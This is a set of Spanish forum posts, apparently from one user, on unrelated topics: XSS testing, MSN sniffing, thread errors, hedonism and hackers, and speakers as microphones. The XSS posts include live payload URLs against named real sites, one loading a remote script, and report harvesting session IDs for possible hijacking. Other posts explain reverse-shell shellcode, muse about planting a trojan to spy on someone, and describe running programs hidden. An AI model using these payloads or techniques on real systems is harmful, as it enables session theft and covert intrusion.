cuando en una pagina se piden datos.. tambien se pueden insertar scripts ahi no? pero que pasa con las paginas que siempre ponen (") a inicio y al final de la cadena de texto o cuando codifican los caracteres < y > ? estas paginas no son vulnerables o hay tecnicas para saltar estos filtros?

otra cosa sobre los scripts. ¿tambièn se puede hacer con vbscript? y dònde puedo aprender mas sobre scripts?  es muy boba la pregunta, pero quizàs àlguien tenga algùn buen link.

Gracias.

solucionado, Gracias  .



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?



Nu sabia, si hay que borrar el post esta todo bien :]

la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades! 

que puertos muestra el cain? que es lo que hace? porque creo que msn usa https, y si saltar https fuese tan facil como poner el cain no seria tan seguro el ssl. Si se fijan el msn usa el puerto 443 porque usa http ecapsulado en una capa segura... esto casi totalmente convencido de que todo su problema pasa por aca.

fijense esto:

http://www.telefonica.net/web2/telamarinera/docus/protocolo_msn.pdf

es viejo, realiza una conexión a los servidores del msn via telnet, todo viaja en texto plano. si alguno es capaz de hacer funcionar HOY esto que avise, porque creo que ya no funciona con texto plano.

o bien pueden leer un poco de esto:

http://www.hypothetic.org/docs/msn/index.php

qizas con un sniffer comun y silvestre y con el conocimiento del funcionamiento del protocolo puedan sacar algo en claro.

En el subforo de troyanos alguien habia hecho un troyano que usaba este protocolo, no se que paso con eso, pueden preguntar por él y pedirle que les heche una mano. Si saben de algo posteen.

es verdad, porque esto SI funciona:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert()</script>

y mi duda sobre las cookies es asi:

Si las cookies robadas pertenecen a la pagina mediante la cual se esta llevando el ataque, o sea... en este caso solo se pueden robar cookies de la pagina foroswebgratis? o si la persona esta, por ejemplo, tambien logueada en otro foro al mismo tiempo... esas cookies tambien pueden ser robadas? o es necesario una vulnerabilidad similar en la otra pagina?

----------------- Minutos despues ----------------------

segui paso a paso las instrucciones y al usar el codigo en la pagina se crea un archivo log.txt que contiene valores de PHPSESSID, me aprecen 3 y son el mismo valor asi que supongo que son solo de la misma pagina (foroswebgratis)

Pero PHPSESSID no son cookies, no son un valor para definir una sesion? se puede emplear para suplantar la sesion de un usuario?

Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..

1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

 

2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Gracias.

a mi me quedo lo que dijo sobre las shellcodes largas y cortas, Tendrias que saber usar las apis winsock que son para realizar conexiones y tenes un lio con pipes (tuberias) seria algo asi

con winsock haces que tu programa cree un socket y puede hacer una de dos cosas ponerlo a la escucha en un cierto puerto de tu maquina esperando que alguien se conecte o conectarte a una maquina remota a un cierto puerto. Cuando la conexion esta establecida circulan los datos y los tenes que tomar del socket o ponerlos en el socket para mandarlos con las correspondientes apis. Bueno, los pipes son parecidos pero no son para eso, sino que por ejemplo ejecutas una consola de comandos y generalmente te muestra los datos por la pantalla y los recibe por teclado, entonces con pipes (tuberias) lo que haces es sustituir la entrada y salida de datos de la consola por dos tuberias que te mandan los datos a algun lado donde quieras leerlos o desde donde quieras enviarlos, entonces en las shellcodes se usa winsock y pipes para hacer shelles remotas. que hacen esto: crean una ventana cmd.exe oculta y los datos en lugar de mostrarlos por la ventana los conecta, mediante una tuberia a un socket, y de igual modo con la entrada (el teclado), entonces estas en algun lugar del mundo conectado cortesia de winsock y manejando la consola cortesia de las tuberias.

Las shellcodes largas generalmente son asi porque no son harcodeadas sino universales, o sea pueden funcionar en (digamos de alguna manera rapida) casi todos los WIN. y tienen que ser largas porque exploran el archivo ejecutable en busca de por ejemplo la direccion base de kernel32.dll para buscar apis como loadlibrary y getprocaddress o algo asi (estoy seguro que lo escribi mal ) creo que se llama metodo PEB y yo me lo confundia con el formato PE

Al final un autoextraible tambien es un exe, estas en lo mismo. Lo que tenes que saber es que necesitar aprovechar un bug y conocer sobre shellcodes para poder realizar algo como lo que queres. Eso esta en el subforo de bugs y exploits. Lo mas cercano a eso que vi fue cuando salio el bug de los cursores animados ANI que cuando visitabas una pagina con un cursor "especialmente diseñado" podias sufrir la ejecucion de cierto codigo en tu maquina.

No sean duros con el muchacho, si parece muy claro lo que quiere, seguro que ustedes tambien. Creo que lo que quiere es meter un troyano en una maquina y podes espiar las conexiones de esa persona, paginas visitadas y hasta sus cookies o quizas la mitad de sus charlas en el msn, o quien sabe. Creo que es eso, porque una vez se me ocurrio, pero winpcap me arruino los planes :S lo admito, me cuesta.

en realidad no discuto el concepto de hedonismo:


Pero no creo que se pueda negar que el que tipo tratò el hedonismo en la actualidad se referia a la rama cirenaica del hedonismo.

Ademas se ve que sos un tipo que aprueba el hedonismo y no tengo nada en contra de ello.

Como ùltima cosa, el castigo al placer es una conocida forma de manipular a las personas que hoy en dia no es tan efectiva o mejor dicho que actualmente no hay tanta gente suceptible a esta manipulaciòn. Pero si te paràs un dia a ver un kiosco de revistas, haces un rato de zapping o naufragas en internet... vas a ver que la manipulacion existe pero en la forma opuesta. Ayer te dicìamos no tengas relaciones si no nos firmàs un papel y hoy te decimos tenè relaciones como dice nuestra revista, radio, canal y pagina web. Antes te dicìamos no comàs mucho y hoy te decimos que, cuando y còmo comer. Antes te diciamos que la codicia era mala y hoy te decimos que un auto barato es como ir a pie y te lo vamos a hacer sentir, no lo dudes. Àntes decìamos que el placer era malo y hoy te decimos es bueno y que te pongas como queremos porque te vamos a dar placer.

Antes el castigo por gozar era ETERNO despues de la muerte, hoy el catigo por no comprar placer es IMEDIATO.

Cuando mete a Platón y a la figura del hacker en la misma bolsa, lo que està haciendo es una especie de paràbola, una analogia. A lo que apunta es al acto revolucionario y basado en una minuciosa observacion, ese es el punto en comùn entre el hacktivismo y la revoluciòn de Platòn y su Republica. Y cuando el autor del titulo se refiere al hedonismo es porque tambien es considerado el polo opuesto del altruismo, el hedonismo es la busqueda del los placeres personales como objetivo y se divide en dos ramas (los que buscan el placer inmediato o carnal, por llamarlo de algun modo, y el hedonismo que busca una satisfaccion mas elaborada y relacionada con los conocimientos adquiridos con esfuerzo, algo mas bien intelectual, pero que no deja de ser una superación y una realizacion personal) en cambio el altruismo es sacrificarse por el bienestar ajeno dejando de lado todo lo propio.. algo mas parecido a la caridad y la entrega.

El autor de la nota propone a un revolucionario altruista para terminar con este mundo individualista en la que todos buscamos el bienestar individual y no el general y la posibilidad de que ese revolucionario sea un hacker.

Este tipo hace esta parabola, pero no nota que la mayoria de los hackers son seres hedonistas ¿¿O como llamarian a entrar en un sistema y poner "no puedes atraparme"?? y falla en planterlos como solucion para este mundo individualista, porque para terminar con un mundo compuesto por indivios y su ropa, individuos y su auto, individuos y su dinero toma a un individuo y su computadora.

la revolucion que cambie a este mundo tiene que estar dirigida por altruistas y no es lo que abunda, el codigo abierto es una muestra de altruismo, el creer que el conocimiento pertenece a la humanidad independientemente de la cabeza en la que brote es altruismo, pero la egolatria hacker es una murralla gruesa que desmorona la teoria del filosofo que escribio la nota del principio.

respecto a Dios... ayuda a alguien, llama "Dios" al motivo y no pidas nada a cambio.. no te compliques.

gracias por responder, pero me habia asustado porque me asegurè de no usar variables globales en los hilos, todas locales y me saltó un error con un dato de un hilo en otro y debuggeando un poco me di cuenta que era un error en una dll mia. No sabia que los mutex tenian que ver con este tema, en realidad no tengo idea de que son pero habia visto algunas apis y siempre me imagine que tendrian que ver con distinstas instancias de las aplicaciones pero veo que pasa por otro lado jajaj otra vez muchas gracias.

creo un thread que corre una parte de codigo que es un bucle (no una variables globales) creo otro thread que corra la misma parte de codigo y me saltan unos errores. Es posible lo que estoy haciendo? o tengo algunos conceptos erroneos? se que se pueden ejecutar cosas "simultaneamente" pero pueden dos threads estar corriendo la misma parte de codigo?

Un parlante, bocina o altavoz (como quieran llamarlo) estan compuesto por una bobina de cobre y un iman. Cuando lo conectas para que salga sonido lo que hace es circular corriente por la bobina y generar un campo magnetico que hace que la bobina se aleje del iman y mueva la membrana que emite el sonido. Ahora si conectas en el lugar del microfono... el ROSA recuerda!!! jajajja lo que sucede es que las ondas sonoras, que son ondas de presion que se propagan por el aire estimulan la membrana del altavoz y la hacen mover, esto hace mover la bobina de cobre en el campo magnetico del iman y como todos sabemos.. en un conductor sometido a un campo magnetico variable se genera una fem (en este caso el campo magnetico es fijo y la bobina se mueve. Es es el principio que hace funcionar cualquier dinamo para la luz de la bicicleta)... o sea estara generando corriente con tu voz... es exactamente lo que hace un microfono que no sea piezoelectrico. lo que tenes que conseguir es un altavoz con una membrana muy debil y facil de mover con la voz.. digamos algo pequenito como los auriculares de un mp3 y cuanto mas expuesta este la membrana mejor.

si a alguien le interesa un microfono piezoelectrico funciona con un cristal que genera electricidad con presion, o sea, en lugar de que tu voz mueva una membrana presiona una y otra vez un cristalito y este envia pulsos electricos que despues van a ser amplificados... y adivinen que!!! este fenomeno tambien es utilizado en sentido inverso para generar sonido en las tarjetas musicales.

la ciencia es interesante no?

Con cualquier lenguaje hace un programa que use el api WinExec y con esa api podes ejecutar lo que quieras y si queres lo hace hide pasando 0 como parametro en la forma en que queres que aparezca la ventana. Y despues en lugar de ejecutar el "calc.exe" desde el registro ejecutas ese programa que ejecuta el calc hide... sino, te queda crackear el exe. Modificando los parametros del api que crea la ventana. Saludos.